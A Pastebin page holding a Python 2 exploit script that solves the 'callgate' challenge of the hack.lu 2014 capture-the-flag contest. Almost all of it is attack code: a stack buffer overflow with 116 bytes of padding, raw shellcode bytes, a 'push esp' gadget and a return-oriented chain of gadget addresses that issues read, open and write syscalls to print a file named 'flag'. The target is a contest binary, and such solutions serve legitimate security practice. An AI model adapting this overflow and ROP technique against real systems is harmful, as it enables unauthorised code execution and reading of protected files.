SHARE
TWEET

callsploit.py

a guest Oct 23rd, 2014 267 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/urs/bin/python2.7 -u
  2. #Exploit for "callgate" - hack.lu 2014
  3. #By nsr from tasteless - www.tasteless.se
  4.  
  5. import struct, time
  6.  
  7. addr = 0xffff7800
  8. sc = '\x89\xe5\xb8\xef\xbe\xad\xde\x89\x04\x24\xb8\x01\x00\x00\x00\x89\x45\x04\x31\xc0\x89\x45\x08\x89\xe8\x83\xe8\x24\x89\x45\x0c\xb8\x00\x02\x00\x00\x89\x45\x10\xb8\x10\x81\x04\x08\xff\xe0'
  9.  
  10. print '#hello' #valid file on the server
  11.  
  12. a = "A" * 116
  13. a += struct.pack('<I',0x080483a6) #best gadget ever:  push esp ; jl 0x80483ab ; dec cl ; ret
  14. #since the jmp is not taken, eip will point to top of the stack which is under our control AND NX \o/
  15. a += sc
  16.  
  17. print a
  18. time.sleep(1)
  19.  
  20. ###read###
  21. b = struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
  22. b += struct.pack('<I',0x3)        #will become eax
  23. b += struct.pack('<I',0xdeadbeef)
  24. b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
  25. b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
  26. b += struct.pack('<I',0x0700001a) #ret
  27. b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
  28. b += struct.pack('<I',0x00) #ebx
  29. b += struct.pack('<I',addr) #ecx
  30. b += struct.pack('<I',0x10) #edx
  31.  
  32. ###open###
  33. b += struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
  34. b += struct.pack('<I',0x5)  #eax
  35. b += struct.pack('<I',0xdeadbeef)
  36. b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
  37. b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
  38. b += struct.pack('<I',0x0700001a) #ret
  39. b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
  40. b += struct.pack('<I',addr) #ebx
  41. b += struct.pack('<I',0x2000) #ecx
  42. b += struct.pack('<I',10) #edx
  43.  
  44. ###read###
  45. b += struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
  46. b += struct.pack('<I',0x3)  #eax
  47. b += struct.pack('<I',0xdeadbeef)
  48. b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
  49. b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
  50. b += struct.pack('<I',0x0700001a) #ret
  51. b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
  52. b += struct.pack('<I',0x04) #ebx
  53. b += struct.pack('<I',addr) #ecx
  54. b += struct.pack('<I',0x50) #edx
  55.  
  56. ###write###
  57. b += struct.pack('<I',0x0804877d)  #pop edi ; pop ebp ; ret
  58. b += struct.pack('<I',0x4)  #eax
  59. b += struct.pack('<I',0xdeadbeef)
  60. b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
  61. b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
  62. b += struct.pack('<I',0x0700001a) #ret
  63. b += struct.pack('<I',0x0804877c)  # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
  64. b += struct.pack('<I',0x01) #ebx
  65. b += struct.pack('<I',addr) #ecx
  66. b += struct.pack('<I',0x50) #edx
  67.  
  68. ###exit - There's got to be time for that###
  69. b += struct.pack('<I',0x080483B7)
  70.  
  71. print b
  72. time.sleep(1)
  73.  
  74. c = 'flag\x00'
  75. print c
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top